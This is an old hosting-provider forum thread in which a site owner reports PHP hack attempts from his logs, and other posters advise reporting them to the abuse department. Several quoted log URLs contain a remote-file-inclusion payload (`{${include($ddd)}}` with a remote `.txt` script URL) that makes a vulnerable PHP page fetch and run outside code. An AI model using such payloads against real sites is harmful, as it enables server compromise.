Help - Search - Members - Calendar
Full Version: Hack attempt from The Planet IP...
The Planet Forums > System Administration > Other
Aerosmith
icon_cry.gif I was just reviewing some of the tracking on one of my sites and I see this...

http://www.mydomain.com/poll/comments.php?...uk/id/mic22.txt?
2008-03-21
13:01:05
66.98.216.89

When I look up that IP in Arin I see that it is a The Planet IP.


As you can clearly see if you load that appended TXT file into a browser window, it is a php hack script. Why is someoen from The Planet running a hack script on one of my servers?
Kevin Hazard
QUOTE (Aerosmith @ Mar 21 2008, 03:07 PM) *
icon_cry.gif I was just reviewing some of the tracking on one of my sites and I see this...

http://www.mydomain.com/poll/comments.php?...uk/id/mic22.txt?
2008-03-21
13:01:05
66.98.216.89

When I look up that IP in Arin I see that it is a The Planet IP.
As you can clearly see if you load that appended TXT file into a browser window, it is a php hack script. Why is someoen from The Planet running a hack script on one of my servers?


I'm certainly no tech-guy, but it looks like the hack attempt is coming from a customer hosted on one of The Planet's IP addresses (rather than from someone working at The Planet). I might be entirely wrong, but if that's the case, I'm sure the abuse department would lay the smack down on them for you if you pass an email along to them.

-Kevin
Aerosmith
I would think that is a distinct and probable thing. Could as well be someone spoofing their IP. Ill forward to abuse.
Kevin Hazard
QUOTE (Aerosmith @ Mar 21 2008, 04:25 PM) *
I would think that is a distinct and probable thing. Could as well be someone spoofing their IP. Ill forward to abuse.


Awesome.

Did you see Mark calling you out in the 1,000,000 post thread?: http://forums.theplanet.com/index.php?showtopic=49093&view=findpost&p=589087 ://http://forums.theplanet.com/index.p...t&p=589087 ://http://forums.theplanet.com/index.p...t&p=589087 ://http://forums.theplanet.com/index.p...t&p=589087 icon_smile.gif
markcausa
Hahaha. http://youtube.com/watch?v=W91sqAs-_-g
James Jhurani
QUOTE (Aerosmith @ Mar 21 2008, 04:25 PM) *
I would think that is a distinct and probable thing. Could as well be someone spoofing their IP. Ill forward to abuse.


You can't spoof a fully established TCP connection, since it requires that you complete the tcp 3-way handshake.
Aerosmith
Yet another from a ThePlanet IP...

http://www.mydomain.com/?id=%7B$%7Binclude($ddd)
%7D%7D%7B$%7Bexit()%7D%7D&ddd=
http://www.idowebhosting.net/catalog/includes/sys.txt?? <<---- NOTE THIS PART
207.44.238.63
2008-03-23
08:57:40

Sad that TP allows this stuff so regularly.
Aerosmith
Yet one more....

http://www.mydomain.com/aeropolls/?id=%7B&...lude($ddd)
%7D%7D%7B$%7Bexit()%7D%7D&ddd=
http://www.mediablackouts.com/wiki/db/id.txt?
70.85.175.34
2008-03-23
08:58:40


Can anything be done to halt this or is it one of those issues that as long as I have everything buttoned up correctly all is well?
Aerosmith
Just as an FYI I have several other The Planet IPs attempting this. Here are a couple of more. Seems odd that my server is having so many attempts to hack php. ANy advice on how I can pinpoint why this is happening and what all I need to aware of to prevent any harm?

209.85.107.22
74.52.9.219
markcausa
What software are you using to monitor and detect these hack attempts, Aerosmith? Mod Security?
Aerosmith
Actually the quickest way for me to find this is by viewing one of the counter scripts that I have written. These things show up as 404 errors and get flagged by that script. I have security packages installed as well, just this is somehting that is a very quick and easy palce to see such activity.
markcausa
QUOTE (Aerosmith @ Mar 24 2008, 09:07 AM) *
Actually the quickest way for me to find this is by viewing one of the counter scripts that I have written. These things show up as 404 errors and get flagged by that script.

Interesting...
Tomy Durden
Make sure to get those logs over to abuse at theplanet dot com so they can investigate. Some of those IP addresses look like they may, or may not, have open investigations already going, but the more information our abuse guys can get, the better off we all are.

I can't really divulge any specific information on any specific investigations.
Aerosmith
OK I'll do that... Thank you.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2009 Invision Power Services, Inc.